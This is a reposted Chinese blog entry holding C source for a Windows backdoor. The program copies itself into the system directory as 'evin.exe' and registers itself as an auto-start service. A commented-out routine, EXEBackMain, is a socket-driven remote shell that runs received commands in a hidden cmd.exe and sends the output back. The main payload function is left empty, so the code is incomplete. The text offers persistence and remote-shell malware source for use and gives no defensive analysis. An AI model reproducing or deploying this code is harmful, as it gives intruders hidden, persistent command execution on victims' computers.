标签:
源码:
#include <winsock2.h> #include <windows.h> #include <stdio.h> #pragma comment(lib, "ws2_32.lib") void WINAPI ServiceMain(DWORD,LPTSTR *); //DWORD WINAPI CmdService(LPVOID); //DWORD WINAPI CmdShell(LPVOID); void WINAPI ServiceCtrlHandler(DWORD Opcode);//服务控制函数 BOOL InstallCmdService(); void DelServices(); void door(); //VOID WINAPI EXEBackMain (LPVOID s); SERVICE_STATUS m_ServiceStatus; SERVICE_STATUS_HANDLE m_ServiceStatusHandle; BOOL bRunning=true; int main(int argc,char *argv[]) { SERVICE_TABLE_ENTRY DispatchTable[] = { {"evin",ServiceMain},//服务程序的名称和入口点(函数) {NULL ,NULL }//SERVICE_TABLE_ENTRY结构必须以“NULL”结束; }; // if(argc==1) door(); if(argc==2) //两个参数,第一个参数是程序本身,第二个是自己输入的。 { if(!stricmp(argv[1],"-i"))//如果第二个参数等于-install { InstallCmdService(); } else if(!stricmp(argv[1],"-r"))//比较字符串s1和s2,但不区分字母的大小写 { DelServices(); } // return 0; } StartServiceCtrlDispatcher(DispatchTable);//把入口点的地址传入 return 0; } void door () { //主程序 } void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpArgv) //服务主函数 { m_ServiceStatus.dwServiceType = SERVICE_WIN32; m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING; m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;; m_ServiceStatus.dwWin32ExitCode = 0; m_ServiceStatus.dwServiceSpecificExitCode = 0; m_ServiceStatus.dwCheckPoint = 0; m_ServiceStatus.dwWaitHint = 0; m_ServiceStatusHandle = RegisterServiceCtrlHandler("hevin",ServiceCtrlHandler); if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)return; m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; //设置服务状态 m_ServiceStatus.dwCheckPoint = 0; m_ServiceStatus.dwWaitHint = 0; //SERVICE_STATUS结构含有七个成员,它们反映服务的现行状态。 //所有这些成员必须在这个结构被传递到SetServiceStatus之前正确的设置 if( SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus)) bRunning=true; door(); //启动我们的服务程序 return; } void WINAPI ServiceCtrlHandler(DWORD Opcode)//服务控制函数 { switch(Opcode) { case SERVICE_CONTROL_PAUSE: // we accept the command to pause it m_ServiceStatus.dwCurrentState = SERVICE_PAUSED; break; case SERVICE_CONTROL_CONTINUE: // we got the command to continue m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; break; case SERVICE_CONTROL_STOP: // we got the command to stop this service m_ServiceStatus.dwWin32ExitCode = 0; m_ServiceStatus.dwCurrentState = SERVICE_STOPPED; m_ServiceStatus.dwCheckPoint = 0; m_ServiceStatus.dwWaitHint = 0; SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus); bRunning=false; break; case SERVICE_CONTROL_INTERROGATE: break; } return; } BOOL InstallCmdService()//安装服务函数 { char strDir[1024]; SC_HANDLE schSCManager,schService; GetCurrentDirectory(1024,strDir);//取当前目录 GetModuleFileName(NULL,strDir,sizeof(strDir));//取当前文件路径和文件名 char chSysPath[1024]; GetSystemDirectory(chSysPath,sizeof(chSysPath));//取系统目录 strcat(chSysPath,"\\evin.exe");//将svchost.exe拼接到系统目录 if(CopyFile(strDir,chSysPath,FALSE))printf("Copy file OK\n"); // 把当前服务程序复制到系统根目录为system.exe strcpy(strDir,chSysPath); schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) { printf("open scmanger failed,maybe you do not have the privilage to do this\n"); return false; } LPCTSTR lpszBinaryPathName=strDir; schService = CreateService(schSCManager, "evin", "evin", //将服务的信息添加到SCM的数据库 SERVICE_ALL_ACCESS, // desired access SERVICE_WIN32_OWN_PROCESS, // service type SERVICE_AUTO_START, // start type SERVICE_ERROR_NORMAL, // error control type lpszBinaryPathName, // service's binary NULL, // no load ordering group NULL, // no tag identifier NULL, // no dependencies NULL, // LocalSystem account NULL); // no password if (schService) printf("Install Service Success!\n"); else return false; CloseServiceHandle(schService); return true; } void DelServices() { char name[100]; SC_HANDLE scm; SC_HANDLE service; SERVICE_STATUS status; strcpy(name,"evin"); if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL) { printf("OpenSCManager Error "); } service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE); if (!service) { printf("OpenService error! "); return; } BOOL isSuccess=QueryServiceStatus(service,&status); if (!isSuccess) { printf("QueryServiceStatus error! "); return; } if ( status.dwCurrentState!=SERVICE_STOPPED ) { isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status); if (!isSuccess ) printf("Stop Service error! "); Sleep( 500 ); } isSuccess=DeleteService(service); if (!isSuccess) printf("Delete Service Fail!"); else printf("Delete Service Success! "); CloseServiceHandle(service ); CloseServiceHandle(scm); } ///////////////////////////////////////////////////////////////////////////////// /* VOID WINAPI EXEBackMain (LPVOID s) //BOOL EXEBackMain (SOCKET sock) { SOCKET sock=(SOCKET)s; STARTUPINFO si; PROCESS_INFORMATION pi; HANDLE hRead=NULL,hWrite=NULL; TCHAR CmdSign[]="\nGood Luck!:\\>"; while (TRUE) { TCHAR MsgError[50]={0}; //错误消息缓冲 TCHAR Cmdline[300]={0}; //命令行缓冲 TCHAR RecvBuf[1024]={0}; //接收缓冲 TCHAR SendBuf[2048]={0}; //发送缓冲 SECURITY_ATTRIBUTES sa; DWORD bytesRead=0; int ret=0; sa.nLength=sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor=NULL; sa.bInheritHandle=TRUE; //创建匿名管道 if (!CreatePipe(&hRead,&hWrite,&sa,0)) { goto Clean; } si.cb=sizeof(STARTUPINFO); GetStartupInfo(&si); si.hStdError=hWrite; si.hStdOutput=hWrite; //进程(cmd)的输出写入管道 si.wShowWindow=SW_HIDE; si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录 strcat(Cmdline,"\\cmd.exe /c "); //拼接cmd // ret=send(sock,CmdSign,sizeof (CmdSign),0); //向目标发送提示符 if (ret==SOCKET_ERROR) { goto Clean; } ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); //接收目标数据 //如果为exit或quit,就退出 if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0) { send(sock,BYEBYE,sizeof (BYEBYE),0); goto Clean; } //表示对方已经断开 if (ret==SOCKET_ERROR) { goto Clean; } //表示接收数据出错 if (ret<=0) { #ifdef DEBUGMSG sprintf(MsgError,"recv() GetLastError reports %d\n",WSAerron); send(sock,MsgError,sizeof (MsgError),0); #endif continue; } Sleep(100); //休息一下,可要可不要 strncat(Cmdline,RecvBuf,sizeof (RecvBuf)); //拼接一条完整的cmd命令 //创建进程,也就是执行cmd命令 if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) { continue; } CloseHandle(hWrite); while (TRUE) { //无限循环读取管道中的数据,直到管道中没有数据为止 if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0) break; send(sock,SendBuf,bytesRead,0); //发送出去 memset(SendBuf,0,sizeof (SendBuf)); //缓冲清零 Sleep(100); //休息一下 } } Clean: //释放句柄 if (hRead!=NULL) CloseHandle(hRead); if (hWrite!=NULL) CloseHandle(hWrite); //释放SOCKET if (sock!=NULL) closesocket(sock); WSACleanup(); ExitThread(0); //return 0; } */
标签:
原文地址:http://blog.csdn.net/ghevinn/article/details/43489629